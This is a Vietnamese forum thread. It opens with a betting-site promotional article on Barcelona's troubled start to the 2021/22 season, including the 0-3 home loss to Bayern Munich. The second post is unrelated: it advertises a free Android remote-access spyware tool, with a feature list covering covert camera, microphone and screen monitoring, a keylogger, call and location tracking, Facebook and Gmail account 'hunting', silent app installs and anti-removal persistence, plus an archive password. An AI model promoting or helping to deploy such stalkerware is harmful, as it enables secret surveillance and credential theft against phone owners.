Soikeo.info cập nhật: Barcelona đang gặp khó khăn trong giai đoạn đầu mùa giải 2021/2022

Thảo luận trong 'Chơi Game Online Trực Tuyến' bắt đầu bởi tiensinh95, 22/9/21.

  1. tiensinh95

    tiensinh95 Member

    Một tuần đáng quên với Barcelona khi Bayern Munich đã dễ dàng đánh bại họ trong trận mở màn bảng E Champions League với tỷ số 3-0 ngay tại Camp Nou....

    Thomas Muller đã mở tỉ số khi pha dứt điểm từ xa của anh ấy bị Eric Garcia làm chệch hướng khiến Marc-Andre ter Stegen bó tay. Robert Lewandowski sau đó đã ghi hai bàn thắng trong hiệp hai, tận dụng các pha phản công sau khi Jamal Musiala và Serge Gnabry dứt điểm trúng cột dọc.

    Barcelona sau đó lại thi đấu tệ hại trên sân nhà ở đấu trường La Liga khi gặp Granada và chỉ có kết quả hòa 1-1, họ hiện đang kém ngôi đầu của Real Madrid tới 5 điểm dù đá ít hơn 1 trận. Cùng FB88 đánh giá và phân tích những lùm xùm đang bủa vây lấy Barcelona ở mùa giải này nhé.

    Xem thêm: soi kèo

    Người hâm mộ thậm chí đã mất niềm tin với CLB lẫn cầu thủ

    Khán giả tại Camp Nou đã chế nhạo cầu thủ của họ trong trận thua 0-3 trước Bayern Munich vào giữa tuần trước. Gerard Pique cho biết anh "bị tổn thương" khi nghe những lời chế nhạo nhắm vào người đồng đội Sergi Roberto, người hâm mộ chủ sân Camp Nou ngày càng mất kiên nhẫn với Sergi Roberto khi anh ấy thi đấu tệ hại trong vai trò hậu vệ cánh và huýt sáo với khi anh ấy bị thay ra ở phút thứ 59.

    Trận thua trước Bayern Munich đánh dấu lần đầu tiên trong lịch sử mà Barcelona đã thất bại trong 3 trận sân nhà liên tiếp tại cúp châu u, họ thậm chí nhận tới 10 bàn thua và ghi có 1 bàn trong những trận đấu đó.

    · 10 cầu thủ kiếm tiền giỏi nhất 2021: Ronaldo đánh bật Messi; Choáng với Top 3
    · Messi đang cảm thấy bất tiện tại PSG

    Ngoài ra, Barcelona đã không thể sút trúng đích lần đầu tiên trong một trận đấu tại Champions League kể từ mùa giải 2003-04. Blaugrana sẽ cần phải nhanh chóng tập trung lại để tránh bị loại ngay từ vòng bảng, với các đội bóng ở bảng E là Benfica và Dynamo Kiev đều không xa lạ gì với giải đấu này nên họ có sự khó chịu nhất định. Rõ ràng là sau khi Messi ra đi, đội bóng xứ Catalan không còn có thể cạnh tranh với những ông lớn ưu tú của châu Âu.

    HLV Koeman đang thiếu lựa chọn trong khâu nhân sự

    Huấn luyện viên người Hà Lan đã thừa nhận có lo ngại về việc dựa vào quá nhiều sao trẻ để vượt qua cuộc khủng hoảng chấn thương hiện tại của đội bóng. Ông hiện đang miễn cưỡng cho ra sân quá nhiều cầu thủ trẻ hiện tại và đang chờ đón những cái tên như Ansu, Sergino Dest, Sergio Aguero, Martin Braithwaite và Ousmane Dembele đều đang phải dưỡng thương.
     

    Like Ủng Hộ Diễn Đàn

  2. [​IMG]
    Tested on Android : 5,6,7,8,9,10,11
    Application Features :
    ——
    Manage :
    Files
    Sms
    contacts
    Calls
    Applications
    Accounts
    ——
    Monitor :
    Camera
    Live screen
    Microphone
    Keylogger
    Location
    Real time calls monitor
    ——
    Tools :
    Download apk and install
    Show message
    Open link
    Call number
    Phone info
    —–
    Social media Hunter:
    Facebook
    Gmail
    More coming soon
    ——
    Super mode :
    Anti-Kill
    Anti-Delete
    Realtime Monitor Active App
    Auto Click Start Screen Record
    Anti shutdown phone
    ———————————-
    [​IMG]
    This is free version will not have Support
    —–
    Pass : BY_EVLF
    [​IMG]
     

Chia sẻ trang này